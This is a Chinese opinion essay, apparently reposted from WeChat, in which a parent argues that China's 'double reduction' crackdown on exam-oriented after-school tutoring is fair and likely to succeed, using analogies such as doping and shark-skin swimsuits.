接下来,我要请那些认为自己非常需要课外培训的家长,想想这么一个问题:如果你们想学的科目(外教英语也好、思维培训也好、大语文素养也好)立马在全国范围取消考试,小升初、中高考全部不考,你还会坚定地让孩子报名参加课外培训吗?
这个答案“是”或“否”,决定了这门课的核心意义。
如果答案是“是”,那这是一门对于孩子的成长发育、思想形成、长远发展有正面作用的“育人课”。如果答案是“否”,那这就是一门为了冲击某项升学考试而设的“工具课”。当然,很多“工具课”也有它的长远意义,但若是离开了考试就基本没人报读,它就绝对配不上称为“育人课”。
只有“育人课”有可能培养出更全面、更睿智、更有社会责任感的精英人才,为整个国家创造增量价值;而“工具课”只能帮助一部分学生抢夺更好的竞争地位。
所以,如果全民热捧的课外培训班都是“工具课”,那这就是陷入“剧场效应”;如果大家报读的都是“育人课”,那尽管学生辛苦、家长破费,总的来说还是有正面意义的“猎枪效应”。
现在,我想大家都看出来了。这次国家重拳出击,打压课外培训,说明在对过去几十年的培训班进行整体评估以后认定,它们绝大部分都是“工具课”,所有家庭消耗巨大、疯狂“内卷”的结果就是一种无谓的内耗,所以出手取缔。
好事怎么变成坏事的
其实,关于这一点,我也经历了比较长时间的思想转变。
几年前,我曾经反对取缔奥数竞赛,反对“奥数害人”的观点。原因就是,从我自己的成长经验来看,学习奥数对于人的长期成长很大正面作用,所以是一门“育人课”。
但是近几年我深入观察当下的奥数培训机构和课程内容,发现现在奥数的“味道”已经变了。学生不再是冲着培养思维和开发大脑而去,机构更是怎样能提分怎样来,各种记忆、套路、猜题、刷卷,完全偏离了这门课程的本心。
奥数从一门“育人课”变成一门“工具课”,这不是奥数的错,也不是学生的错,是社会风向的错。
我举个例子。珊姐很喜欢做手工,没事就在家里画画然后剪成作品。剪纸这件事又动手又动脑还培养艺术修养和想象力,不可能是一件坏事对吧?
但如果我们搞剪纸比赛,而且冠军可以保送清华,会怎么样?大批学生会因此终日耗在剪纸上,每一刀都用毫米级来衡量对错,所有作品都是临摹过去的高分之作而缺少创造性。再也不会有人喜欢剪纸,也不会记得剪纸带来的好处与快乐。
同一件事情,错误的导向会带来完全不同的效果,量变引起质变,好事也会办成坏事。在我看来,现在大部分的课外培训就已经进入了好事变坏事的程度。学奥数如此,学英语如此,学乐器特长体育特长无不如此。
上培训班是学生的权利吗?
这次40号文政策出台,有不少家长是明确反对的。他们的观点是,家长和学生对培训班有切切实实的需求,有权选择自己想要接受的课外培训。
课外机构爆发式增长到今天这样的规模,确实是被家长们的需求拉动的。可是,大家有需求的东西就一定是好东西吗?一定应该交给自由化的市场经济来供给吗?
现在正在办奥运会,如果有关心奥运或体育的人,应该会记得2008年奥运会上,美国“飞鱼”菲尔普斯连破好几项世界纪录,风光一时无两。可是,这完全是他自己的功劳吗?2009年,有43人次穿着和菲尔普斯一样的“鲨鱼皮泳衣”打破世界纪录。也就是说,这套黑科技泳衣本身,可以帮助运动员提高不少速度。
破纪录一定是好事吗?不见得。国际泳联随后马上禁止了运动员穿这种“鲨鱼皮”泳衣。这就是游泳赛场的规则。在赛场上取得好成绩本来是好事,但是首先得遵守规则,而规则往往是反对单纯内卷的。就像全世界的运动会都禁止使用兴奋剂,因为兴奋剂就是一种典型的纯内卷。
这次40号文的颁布,其实就是彻底改变了教育这个赛场的规则。过度培训就是义务教育阶段的“兴奋剂”和“鲨鱼皮”,规则改变了,所有选手只有接受和适应新规则,而不是大喊“大家对兴奋剂有需求,我们有权自己选择嗑药!”
那为什么课外培训会被规则禁止呢?不仅因为前面说的,培训只是纯内耗、不产生增量价值;还因为课外培训这件工具,对于不同地区、不同收入状况、不同知识水平的家庭来说,是不公平的。
有人说,我花钱花时间送孩子去上课,怎么就不公平了?事实上,不同家庭能够上的课外培训班是完全不一样的。过去线下课时代,大城市的培训师资水平远远超过小城市,后者又远超县城农村;现在有线上课了,小地方有机会接触好的教学资源,可是动辄一两百一节课的费用,岂是全国大部分家庭能承担的?
改革开放以后,“有钱就能买到好东西”的市场经济观念深入人心,“一分钱一分货”这种想法被认为是最公平的。这在绝大部分领域是正确的,可是在教育领域——也就是决定下一代人怎么分配资源——这种花钱买优势的事就不见得公平了。
如果课外培训被认定只是一部分经济条件好的家庭给孩子购买武器,用来碾压其他没有这个条件的孩子,那么这种“市场行为”就绝不“公平”。
当然,相信每一位家长都和我一样很清楚,这世界上没什么是绝对公平的。每个人起手的手牌就不一样,手握3个炸弹的人先跑完牌,这事情公平吗?不管什么规则都不可能让所有人同时满意。
我们都是普通家长,是规则的接受者。我们要做的,就是以最快速度接受和适应新规则,在新规则下打好自己的手牌。
想上课的家长在焦虑什么?
我非常能理解家长们在课外培训班消失以后更加焦虑的心情。
一部分家长焦虑自己孩子的学习,觉得没有了培训班,孩子的成绩万一下滑,自己将束手无策。
这种想法主要是受过去二十年课外培训之兴旺发达的影响,形成严重的“补习依赖症”了。
有的家长也许都忘了,在义务教育阶段,孩子花费时间最多、内容最全面、师资最权威的地方,就是学校。孩子一天在学校超过8小时,一周五天,这样的学习强度如果都没有学会,总是指望周末花两三小时把学校没学到的东西都补上,可能吗?
高考刚刚过去,很多状元都表示自己从来没参加过课外培训。我相信这不是谦虚或者谎言,真正的好学生都知道,把时间放在学校听课和课后自学上,比很多一般的机构要有效多了。
也有家长说,也许对于牛娃,补不补课不重要,可是自己家的娃是普娃甚至学渣,没有课外培训成绩肯定一塌糊涂。
我必须说的是,对于在学校学习已经一塌糊涂的孩子,问题很显然出在学习方法、学习态度与学习效率上,绝不是换个所谓“名师”每周点拨一下就有用的。就好像人体本身有足够的制造血糖的机能,如果一个人长期低血糖,要想的是怎么把肝脏胰腺的问题治好,而不是一直吊葡萄糖。
不管哪一种情况,认为孩子“非参加课外培训不能学好功课”的这种想法,都是过去二三十年被市场环境和课外机构忽悠形成的错觉。
另一部分家长则继续焦虑其他人会通过“一对一”之类的方式,拉开与自己的差距。
在这方面,我觉得并不需要过分担心。从前面的政策背景分析,我想大家也看出来了,这次教育改革重点放在打击不平等上。对于“一对一”这种方式,显然和课外培训机构一样,属于利用财富优势打造教育资源优势,肯定与政策趋势不符。
目前的政策没有明确打击这种培训模式,主要是在过去还没形成气候,没必要同时拿针对性的武器。万一这种方式快速增长,形成新的教育势力,我相信势必成为下一波打击对象。
最近看到一则新闻,黄山市教育局根据家长提供的线索,查处了一位在职教师在别墅内给学生进行有偿补课的行为。据我了解,目前只有在校教师收费补课会被处罚,普通的家教上门培训暂时还不违规。不过如果未来这类情况过于普遍,也不排除制定相关规定来加以限制。
对在职老师举办培训班的重拳,同时也是针对“课上不教课下教”问题的出击。没了利益驱动,绝大部分老师的水平和师德还是在线的,有利于提升校内教学质量。
教育公平就像一座水库,目前只是打开了一个关闭课外机构的闸口,洪水就已经喷涌而出了。还有更多的闸口正在酝酿着打开,最终所有出口汇成一条裹挟一切的历史大河,奔腾向前而去。
为什么我认为这次能办成?
很多家长都说,这次也不是第一次提减负了,往常年年喊减负,实际年年在增负,这次有什么不同?很可能又是雷声大雨点小。
根据我的观察,这次的的改革整顿与以往大不相同,所以我比大部分家长率先一步抛去了以往的怀疑态度。原因有以下几点:
第一是高度不同。这次把整顿课外培训提升到一种政治高度,在我们国家提高到这种高度的事情很少有失败的,因为这类工作是不计成本、不计代价也要完成的,它影响到很多部门官员的乌纱帽问题。
说实话,如果没有强大的政治压力,这种吃力不讨好的事情确实很难推进。课外培训班,是家长、学校、机构三方都你情我愿共同需求的事情,整顿起来肯定困难重重,而且地方政府还会减少税收甚至影响当地学习成绩。
但是提到政治高度就不一样了,哪个地方教育部门年底写总结不写在第一条,这年的活儿算是白干了。

最近都有地方政府把教育的事放到扫黄打非一样的高度了。扫黄打非难不难?过去十年有没有成效?大家可以对比一下。
第二是对象不同。去年以来,课外培训行业发生巨大变化,互联网巨头大举杀进来,所以现在大家咨询的往往就是那么几家,数学XX思维,英语VIPXX等等。行业集中度大幅提高,也让整顿的难度大大减小了。线下小机构被互联网摁死了,现在剩下的主要就是线上线下几十家寡头机构。
放在早几年,教育部门可能不敢拍胸脯保证,但是现在只要紧盯住这些头部机构,工作就完成80%了。你还担心有关部门不出力吗?
第三是时代背景不同。课外培训的整顿不是一件孤立的事情,前有初中公民同摇、中有高中指标到校、后有多地定向打击学位房。反正教育公平化的大趋势已经势不可挡了。
另外,互联网时代的技术手段也更为强大,可以预见未来会有更多的免费线上课程,不同地区学校的师资也有望通过技术来缩小差距。所以,打击课外培训并不是一味的堵,而是既疏又堵,将大河引回主流。
加上课外培训在家长心目中确实是积怨已深,太多家长已经对当下“被逼培训”的现象怨声载道,民心基础比以前更强了。所以,在这样的社会环境下,对课外培训的重锤出击,才能起到比以前更好的效果。
结语
这次的“双减40号文”以及各地市跟进的政策,所有家长估计都有所耳闻,但是认识和想法却各不相同。
有的家长觉得,这又是一波走过场的运动,很快就会回到该补课补课该鸡娃鸡娃的老路子;有的家长觉得,这种政策是一种倒退,自己要逆势而行,才会成为胜利的那个人;有的觉得新政下来会让教育更不公平,富裕人家一对一补课普通人家更无翻身日;还有的觉得以后学习就是大锅饭凭运气,可以彻底躺平。
不同的认知自然带来不同的应对行为,而家长的应对短则影响孩子几年,长则影响一辈子,绝非小事。所以,在这次“双减”改革的重大十字路口前,能不能对整个事情全貌有整体而全面的认知就很重要了。
在我看来,这次对课外辅导的定向打击,主要是因为整个国家在针对升学考试开展的学科培训耗费了巨大的资源,同时还造成了比较大的资源分配不公平问题。
就像剧场效应里说的,你培训,我培训,钱被教育机构收走、孩子的时间被无情消耗以后,所有人还是回到同一起跑线上。
理解这一点后,我们才能掌握国家“双减”的方向和实质,同时对未来教育政策有一定预判。更重要的是,这样我们才可以帮孩子设计顺应国家教育和经济发展趋势的成长之路。
转自:https://mp.weixin.qq.com/s/l791dMlwdWVp9vAwuX8fwg